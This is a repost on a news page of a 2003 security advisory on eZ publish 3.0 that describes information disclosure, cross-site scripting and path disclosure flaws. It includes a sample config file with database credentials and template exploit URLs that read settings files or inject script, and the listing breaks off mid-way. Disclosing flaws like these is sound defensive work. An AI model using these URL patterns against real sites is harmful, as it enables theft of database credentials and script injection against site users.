Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » SecCorp SCSA-016: multiple vulnerabilities in EZ Publish

SecCorp SCSA-016: multiple vulnerabilities in EZ Publish

by Nikola Strahija on April 15th, 2003 A vulnerability has been discovered in EZ Publish version 3.0 and prior which, if exploited, could lead to sensitive information disclosure.


======================================================================
Security Corporation Security Advisory [SCSA-016]

Multiple vulnerabilities in Ez publish
======================================================================

PROGRAM: Ez publish
HOMEPAGE: http://www.ez.no
VULNERABLE VERSIONS: 3.0 and prior ?
RISK: Medium/High
IMPACT: Sensitive information disclosure
Cross Site Scripting
Path Disclosure
RELEASE DATE: 2003-04-15

Security Corporation's Free weekly Newsletter :
http://www.security-corporation.com/index.php?id=newsletter

======================================================================
TABLE OF CONTENTS
======================================================================

1..........................................................DESCRIPTION
2..............................................................DETAILS
3.............................................................EXPLOITS
4............................................................SOLUTIONS
5...........................................................WORKAROUND
6........................................................VENDOR STATUS
7..............................................................CREDITS
8...........................................................DISCLAIMER
9...........................................................REFERENCES
10............................................................FEEDBACK

1. DESCRIPTION
======================================================================

"eZ publish 3 is an open source content management system and
development framework. "

(direct quote from http://www.ez.no)



2. DETAILS
======================================================================

¤ Sensitive information disclosure :

A security vulnerability was found in Ez publish which allow
a remote attacker to access to sensitive informations such
as database's name and password.

This vulnerability can be triggered by a remote user submitting
a specially crafted HTTP request.

For example, an attacker can download the site.ini file and
disclose numerous informations like this :

---- site.ini -----

[DatabaseSettings]
DatabasePluginPath=
# Use either ezmysql or ezpostgresql
DatabaseImplementation=ezmysql
Server=localhost
User=nextgen
Password=nextgen
Database=nextgen
# Enable slave servers
# The slave servers will only be used for read queries
# Useful for load balanced environments
UseSlaveServer=disabled
#SlaveServerArray[]=localhost
#SlaverServerUser[]=nextgen
#SlaverServerPassword[]=nextgen
#SlaverServerDatabase[]=nextgen
# The number of times to reconnect if the first fails
ConnectRetries=0
Charset=iso-8859-1
# Use charset conversion routines in DB if possible
UseBuiltinEncoding=true
Socket=disabled
SQLOutput=disabled
UsePersistentConnection=disabled

[SiteSettings]
# Name of the site, will be used in default templates in titles.
SiteName=eZ publish
# URL of site, often used to link to site in emails etc.
SiteURL=mysite.com
# List of metadata to set in pagelayout
MetaDataArray[author]=eZ systems
MetaDataArray[copyright]=eZ systems
MetaDataArray[description]=Content Management System
MetaDataArray[keywords]=cms, publish, e-commerce, content management
Dir=
# Which page to show when the root index (/) is accessed
IndexPage=/content/view/sitemap/2/
# What to do when a module does not exists, use either defaultpage or
displayerror
ErrorHandler=displayerror
# Displayed if an error occurs and ErrorHandler is set to defaultpage
DefaultPage=/content/view/sitemap/2/
# Default access is needed when uri type matching is done, this is
# because with empty urls it's not possible to fetch the access
DefaultAccess=demo
# How the login page should be handled, use embedded to show inside default
pagelayout
# or custom for loginpagelayout.tpl
LoginPage=custom
# The SSL port, the default should be OK for most sites but can be
# changed if different. If the port is detect all redirects will
# be done with https protocol.
SSLPort=443

-------------------


¤ Cross Site Scripting :

Many exploitable bugs was found in Ez publish which cause script
execution on client's computer by following a crafted url.

This kind of attack known as "Cross-Site Scripting Vulnerability"
is present in many section of the web site, an attacker can input
specially crafted links and/or other malicious scripts.


¤ Path Disclosure :

Many vulnerabilities have been found in Ez publish which allow
attackers to determine the physical path of the application.

These vulnerabilities would allow a remote user to determine the
full path to the web root directory and other potentially
sensitive information. This vulnerability can be triggered by a
remote user submitting a specially crafted HTTP request.




3. EXPLOITS
======================================================================

¤ Sensitive information disclosure :

http://[target]/settings/[file_name]

For example :

http://[target]/settings/site.ini



¤ Cross Site Scripting :

http://[target]/index.php/content/search/?SectionID=3&SearchText=[hostile_co
de]

http://[target]/index.php/content/advancedsearch/?SearchText=[hostile_code]&
PhraseSearchText=[hostile_code]&SearchContentClassID=-1&SearchSectionID=-1&S
earchDate=-1&SearchButton=Search

http://[target]/index.php/[any_section]/">[hostile_code]<

http://[target]/index.php/">

Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »